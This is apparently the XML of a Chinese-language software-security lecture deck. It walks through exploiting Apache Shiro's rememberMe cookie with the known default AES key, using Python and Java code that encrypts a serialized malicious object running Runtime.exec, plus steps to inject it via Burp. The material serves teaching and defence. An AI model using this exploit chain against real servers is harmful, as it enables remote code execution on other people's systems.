            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>import uuid</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>from random import Random</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>from Crypto.Cipher import AES</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>def get_file_data(filename):</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> with open(filename, 'rb') as f:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  data = f.read()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> return data</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>def aes_enc(data):</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> BS = AES.block_size</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> key = "kPH+bIxk5D2deZiIxcaaaA=="</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> mode = AES.MODE_CBC</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> iv = uuid.uuid4().bytes</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> encryptor = AES.new(base64.b64decode(key), mode, iv)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> ciphertext = base64.b64encode(iv + encryptor.encrypt(pad(data)))</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> return ciphertext</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>def aes_dec(enc_data):</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> enc_data = base64.b64decode(enc_data)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> unpad = lambda s: s[:-s[-1]]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> key = "kPH+bIxk5D2deZiIxcaaaA=="</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> mode = AES.MODE_CBC</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> iv = enc_data[:16]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> encryptor = AES.new(base64.b64decode(key), mode, iv)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> plaintext = encryptor.decrypt(enc_data[16:])</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> plaintext = unpad(plaintext)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> return plaintext</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>if __name__ == "__main__":</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> data = get_file_data("dnsurl.bin")</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> print(aes_enc(data))</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>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软件安全问题产生-外因</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558925"/>
            <a:ext cx="9576435" cy="4246245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>互联网发展对软件安全的挑战</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>开发环境和开发人员对软件安全的挑战</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>开发者缺乏安全开发的动机</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> 市场和业务要求将交付期和软件功能做主要因素</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用户方没有提供安全方面的压力</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>开发者缺乏相关知识</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>软件复杂性加大，开发者需要学习更多东西</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> 传统软件开发不进行安全教育</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>缺乏安全开发工具</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>缺乏安全开发配套管理、测试等工具</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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270510" y="1243330"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>运行上述</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>脚本</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="270510" y="1611630"/>
            <a:ext cx="10544175" cy="1333500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="309245" y="3122930"/>
            <a:ext cx="11167745" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>将脚本利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>打入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>remeberMe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中，注意要删除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的JSESSIONID</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="309245" y="3549015"/>
            <a:ext cx="9211310" cy="3238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3" name="图片 2" descr="Snipaste_2024-10-08_07-46-35"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="231775" y="1847850"/>
            <a:ext cx="11746865" cy="3804285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="232410" y="1330960"/>
            <a:ext cx="4441190" cy="396875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>以下是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>结果</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文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="116205" y="1649095"/>
            <a:ext cx="4616450" cy="5097780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>ublic class Demo1 extends AesUtils {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>    public static void main(String[] args) throws IOException, ClassNotFoundException {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>        Test test = new Test();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>        ByteArrayOutputStream baos = new ByteArrayOutputStream();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>        // 1. 序列化恶意对象</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>        // 创建对象输出流，用于序列化对象</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>        ObjectOutputStream oos = new ObjectOutputStream(baos);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>        oos.writeObject(test);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>        // 2. 加密而已对象（byte数组）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>        AesUtils aesUtils = new AesUtils();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>        byte[] encryptByte = aesUtils.encrypt(baos.toByteArray());</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>        // 3. 转为base64</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>        String base64 = Base64.encodeToString(encryptByte);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>        System.out.println(base64);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>class Test implements Serializable {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>    private void readObject(ObjectInputStream in) {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>        try {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>            Runtime.getRuntime().exec("calc");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>        } catch (IOException e) {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>            e.printStackTrace();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>        }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4874260" y="1649730"/>
            <a:ext cx="6263005" cy="4817110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>public class AesUtils {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>    private static final byte[] DEFAULT_CIPHER_KEY_BYTES = Base64.decode("kPH+bIxk5D2deZiIxcaaaA==");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>    private Serializer&lt;PrincipalCollection&gt; serializer = new DefaultSerializer();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>    private CipherService cipherService = new AesCipherService();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>    private byte[] encryptionCipherKey;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>    private byte[] decryptionCipherKey;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>    public AesUtils() {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>        this.setCipherKey(DEFAULT_CIPHER_KEY_BYTES);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>    protected byte[] encrypt(byte[] serialized) {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>        byte[] value = serialized;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>        CipherService cipherService = this.getCipherService();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>        if (cipherService != null) {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>            ByteSource byteSource = cipherService.encrypt(serialized, this.getEncryptionCipherKey());</a:t>
            </a:r>
